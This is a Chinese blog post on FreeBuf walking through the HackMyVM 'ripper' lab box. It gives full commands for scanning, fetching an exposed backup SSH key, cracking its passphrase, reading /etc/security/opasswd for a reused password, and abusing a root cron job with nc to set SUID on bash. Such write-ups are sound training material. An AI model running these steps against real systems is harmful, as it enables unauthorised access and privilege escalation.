freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

记一次hackmyvm综合靶场的渗透测试-ripper
知非 2022-04-09 10:05:34 102062
所属地 黑龙江省

前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

信息收集阶段

靶机:192.168.1.128

Kali攻击机:未知

目标:user权限和root权限


nmap -sn 192.168.1.0/24

1649469608_6250e8a8c11654471a727.png!small?1649469611452

nmap -A -p1-65535 192.168.1.3

1649469614_6250e8aebfe459e00dbc8.png!small?1649469617445

开启了22端口和80端口:

访问下80端口:

漏洞利用阶段

http://192.168.1.3/

1649469641_6250e8c9824faf1e17d27.png!small?1649469643911

显示网站在维护,请下个月再来!

查看网站源代码:啥也没有!

1649469646_6250e8ce89ce3fda95e05.png!small?1649469648996


目录扫描走起:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.3/ -x txt,php,html,log,zip,bak

1649469656_6250e8d812cabbc8f18b8.png!small?1649469658561

发现了这个可疑的文件,打开看看!

http://192.168.1.3/staff_statements.txt

The site is not yet repaired. Technicians are working on it by connecting with old ssh connection files.

网站没有修改,技术人员通过连接旧的SSH连接文件进行连接,并且在其上工作。

旧的SSH连接文件?在哪?

SSH的连接文件是id_rsa,旧的就是id_rsa.bak文件!

我们试着访问下这个文件!!!

http://192.168.1.3/id_rsa.bak

果然有这个文件,下载下来保存!

1649469676_6250e8ec7dba194dfa398.png!small?1649469679003

用户名呢?在这!

1649469685_6250e8f5bc2638de2f78a.png!small?1649469688161

接下来采用用户名和密码进行登录!

下图表明该密钥还需要密码!

1649469693_6250e8fda3ae4527e97bd.png!small?1649469696157

接着,我们对这个密码进行破解!

1649469700_6250e904d7c41ace3ffdc.png!small?1649469703268

1649469705_6250e9099aba4f514081b.png!small?1649469708195

用户名:jack

密钥密码为:bananas

登录下看看:

1649469712_6250e9101e245eaae2bb2.png!small?1649469714722

还有两个用户!并且jack下没有user.txt文件!!

1649469725_6250e91dec5b1ff0cb880.png!small?1649469728452

老样子:sudo -l 和 suid权限查询!都不行!

直接上传脚本,linpeas.sh!!!

1649469731_6250e92369f7956ccb7c5.png!small?1649469733891

1649469740_6250e92c88d5b704d8697.png!small?1649469742961

非常意外,又翻车了!!!并没有找到需要找的东西!!

结合上文内容,我们查找下:

find / -name *passwd* -print

1649469746_6250e93280de4abf53b87.png!small?1649469748921

查看下这个文件:

cat /etc/security/opasswd

jack:Il0V3lipt0n1c3t3a

这个有可能是另一个用户的密码!

1649469765_6250e945bd2918aefe0d4.png!small?1649469768241

第一个flag:

cat user.txt

5c38d7****************5cbe99

权限提升阶段

接着就剩下提权到root了!!

SUID走起!!!

find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null

1649469798_6250e96636eed68b56f17.png!small?1649469800802

没啥可利用的,linpeas.sh脚本没啥用的话,我们换个脚本pspy64脚本!!

1649469802_6250e96ae350b9eb4ad57.png!small?1649469805384

1649469807_6250e96f76d874cca1672.png!small?1649469809876

发现了一个特别的脚本:

/bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi

如果文件之间的内容匹配,我们可以发送一个字符串,然后将SUID权限分配给/usr/bin/<string>

在/home/helder执行!

echo "Il0V3lipt0n1c3t3a" > passwd.txt

echo "bash" > root

nc -lnvp 10000 < root

等待连接:

ls -la /usr/bin/bash

已经获得root组权限:

Id:

helder@ripper:~$id

uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder)

查看最后的flag:

cat /root/root.txt

e28f57*******************96f9f

# 渗透测试 # web安全 # CTF # 靶场平台 # 靶场实战
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 知非 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
hackmyvm靶场实战
知非 LV.8
这家伙太懒了,还未填写个人描述!
  • 125 文章数
  • 40 关注者
一个月学习通过商用密码测评师的经验分享
2025-01-09
等保2.0之AIX安全计算环境测评指导书
2023-05-10
记一次hackmyvm综合靶场的渗透测试-warez
2022-04-27
文章目录